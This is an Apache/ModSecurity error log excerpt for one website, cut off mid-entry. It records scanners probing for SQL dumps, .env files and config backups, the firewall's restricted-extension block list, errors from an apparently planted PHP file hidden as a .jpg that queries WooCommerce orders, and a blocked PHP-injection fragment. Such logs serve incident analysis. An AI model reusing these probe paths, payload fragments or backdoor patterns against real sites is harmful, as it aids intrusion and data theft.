.cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/db.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVFwAAARI"] [Wed Aug 13 23:43:33.100465 2025] [:error] [pid 15178:tid 15192] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/dump.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVGAAAAQI"] [Wed Aug 13 23:43:33.106680 2025] [:error] [pid 15178:tid 15201] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/database.sql"] [unique_id "aJz49TSzh4MhgQx9hZdVGQAAAQs"] [Wed Aug 13 23:43:39.060046 2025] [:error] [pid 15178:tid 15203] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/awslogs.log"] [unique_id "aJz4-zSzh4MhgQx9hZdVLwAAAQ0"] [Wed Aug 13 23:43:39.066238 2025] [:error] [pid 15178:tid 15208] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/var/log/cloud-init.log"] [unique_id "aJz4-zSzh4MhgQx9hZdVMAAAARI"] [Wed Aug 13 23:43:43.983886 2025] [:error] [pid 15178:tid 15197] [client 185.177.72.204:2454] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aJz4_zSzh4MhgQx9hZdVRgAAAQc"] [Sat Aug 30 14:34:09.595908 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:09.595957 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:09.596039 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] [Sat Aug 30 14:34:09 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:09.596043 2025] [:error] [pid 983:tid 998] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10.377071 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:10.377121 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:10.377197 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:10.377202 2025] [:error] [pid 983:tid 1009] [client 34.11.246.179:57135] [Sat Aug 30 14:34:10.597446 2025] [log_config:warn] [pid 983:tid 1009] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:11.520753 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:11.520799 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:11.520890 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] [Sat Aug 30 14:34:11 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:11.520895 2025] [:error] [pid 983:tid 1005] [client 34.11.246.179:57135] [Sat Aug 30 14:34:11.732848 2025] [log_config:warn] [pid 983:tid 1005] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:12.840250 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:12.840303 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] Printing message to stderr: [Sat Aug 30 14:34:12.840399 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] [Sat Aug 30 14:34:12 2025] [info] Executing "/home/id/cms-1.dev-unit.com/index.php" as UID 1004, GID 1004 [Sat Aug 30 14:34:12.840407 2025] [:error] [pid 983:tid 1000] [client 34.11.246.179:57135] [Sat Aug 30 14:34:13.045037 2025] [log_config:warn] [pid 983:tid 1000] (28)No space left on device: [client 34.11.246.179:57135] AH00646: Error writing to /usr/local/apache/domlogs/cms-1.dev-unit.com.log [Sat Aug 30 14:34:13.940408 2025] [:error] [pid 983:tid 1006] [client 34.11.246.179:57135] Could not write to logfile: [Sat Aug 30 14:34:13[Wed Sep 03 14:02:59.113846 2025] [:error] [pid 27308:tid 27315] [client 185.177.72.106:58816] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aLggYxc2qCXtIvVdmfcGGgAAAMU"] [Wed Sep 03 14:03:09.783472 2025] [access_compat:error] [pid 27308:tid 27331] [client 185.177.72.106:58816] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Wed Sep 03 14:03:17.481306 2025] [:error] [pid 27308:tid 27328] [client 185.177.72.106:58816] [client 185.177.72.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aLggdRc2qCXtIvVdmfcGdQAAANI"] [Thu Sep 04 07:56:55.440254 2025] [:error] [pid 26362:tid 26373] [client 185.177.72.236:5608] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aLkcF4De96GZLWV-VCs_VQAAAMk"] [Thu Sep 04 07:57:06.225379 2025] [access_compat:error] [pid 26362:tid 26377] [client 185.177.72.236:5608] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Thu Sep 04 07:57:13.895728 2025] [:error] [pid 26362:tid 26373] [client 185.177.72.236:5608] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aLkcKYDe96GZLWV-VCs_zAAAAMk"] [Sat Sep 20 11:33:17.009117 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 11:33:17.009324 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 11:33:17.009456 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 11:33:17.009547 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 11:33:17.009559 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] Stack trace:, referer: https://www.google.com [Sat Sep 20 11:33:17.009609 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 11:33:17.009619 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] #1 {main}, referer: https://www.google.com [Sat Sep 20 11:33:17.009666 2025] [:error] [pid 1143:tid 1195] [client 207.154.240.68:32890] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Sat Sep 20 17:32:40.666503 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sat Sep 20 17:32:40.666689 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 17:32:40.666819 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sat Sep 20 17:32:40.666911 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:7, referer: https://www.google.com [Sat Sep 20 17:32:40.666923 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] Stack trace:, referer: https://www.google.com [Sat Sep 20 17:32:40.666971 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sat Sep 20 17:32:40.666981 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] #1 {main}, referer: https://www.google.com [Sat Sep 20 17:32:40.667030 2025] [:error] [pid 13886:tid 13906] [client 207.154.240.68:58404] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 7, referer: https://www.google.com [Mon Sep 22 14:44:16.798300 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Mon Sep 22 14:44:16.798493 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 14:44:16.798622 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Mon Sep 22 14:44:16.798711 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Mon Sep 22 14:44:16.798723 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] Stack trace:, referer: https://www.google.com [Mon Sep 22 14:44:16.798769 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Mon Sep 22 14:44:16.798778 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] #1 {main}, referer: https://www.google.com [Mon Sep 22 14:44:16.798826 2025] [:error] [pid 5828:tid 5841] [client 207.154.240.68:60568] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 23 19:07:34.077614 2025] [:error] [pid 8361:tid 8366] [client 20.171.207.145:48978] [client 20.171.207.145] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/event/organize@gmail.com"] [unique_id "aNLFxnNXo-ZiWSoqk0YYCwAAAQM"] [Tue Sep 23 19:11:53.698498 2025] [autoindex:error] [pid 8361:tid 8385] [client 20.171.207.145:48978] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Sep 23 19:39:20.132755 2025] [core:error] [pid 19147:tid 19153] [client 20.171.207.145:42796] AH10244: invalid URI path (/assets/front/js/%url%) [Wed Sep 24 10:46:42.806103 2025] [:error] [pid 24179:tid 24195] [client 210.0.138.248:43969] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 13:23:39.725823 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 13:23:39.726135 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Warning: require_once(/home/id/cms-1.dev-unit.com/config/config.inc.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 13:23:39.726263 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] PHP Fatal error: Uncaught Error: Failed opening required '/home/id/cms-1.dev-unit.com/config/config.inc.php' (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:3, referer: https://www.google.com [Thu Sep 25 13:23:39.726280 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] Stack trace:, referer: https://www.google.com [Thu Sep 25 13:23:39.726327 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Thu Sep 25 13:23:39.726337 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] #1 {main}, referer: https://www.google.com [Thu Sep 25 13:23:39.726391 2025] [:error] [pid 16479:tid 16531] [client 207.154.240.68:57466] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 3, referer: https://www.google.com [Thu Sep 25 15:41:14.272926 2025] [:error] [pid 16577:tid 16583] [client 207.154.240.68:48480] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Thu Sep 25 18:31:36.138498 2025] [:error] [pid 16479:tid 16545] [client 61.222.202.149:42663] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 11:22:37.239075 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Sun Sep 28 11:22:37.239289 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 11:22:37.239420 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Sun Sep 28 11:22:37.239511 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Sun Sep 28 11:22:37.239523 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] Stack trace:, referer: https://www.google.com [Sun Sep 28 11:22:37.239568 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Sun Sep 28 11:22:37.239578 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] #1 {main}, referer: https://www.google.com [Sun Sep 28 11:22:37.239626 2025] [:error] [pid 28689:tid 28706] [client 207.154.240.68:39058] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Tue Sep 30 15:12:55.823662 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Sep 30 15:12:55.823852 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: include(/home/id/cms-1.dev-unit.com/wp-load.php): Failed to open stream: No such file or directory in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 15:12:55.823974 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Warning: include(): Failed opening '/home/id/cms-1.dev-unit.com/wp-load.php' for inclusion (include_path='.:') in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 2, referer: https://www.google.com [Tue Sep 30 15:12:55.824063 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] PHP Fatal error: Uncaught Error: Call to undefined function wc_get_orders() in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg:11, referer: https://www.google.com [Tue Sep 30 15:12:55.824075 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] Stack trace:, referer: https://www.google.com [Tue Sep 30 15:12:55.824125 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] #0 /home/id/cms-1.dev-unit.com/defauit.php(62): require_once(), referer: https://www.google.com [Tue Sep 30 15:12:55.824136 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] #1 {main}, referer: https://www.google.com [Tue Sep 30 15:12:55.824184 2025] [:error] [pid 871:tid 965] [client 207.154.240.68:46294] thrown in /home/id/cms-1.dev-unit.com/nbpafebaef.jpg on line 11, referer: https://www.google.com [Wed Oct 01 17:48:48.904965 2025] [:error] [pid 14547:tid 14561] [client 207.154.240.68:41744] PHP Warning: Undefined variable $tmp in /home/id/cms-1.dev-unit.com/defauit.php on line 33, referer: https://www.google.com [Tue Oct 07 12:32:03.134963 2025] [:error] [pid 4855:tid 4990] [client 139.59.136.184:59504] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag 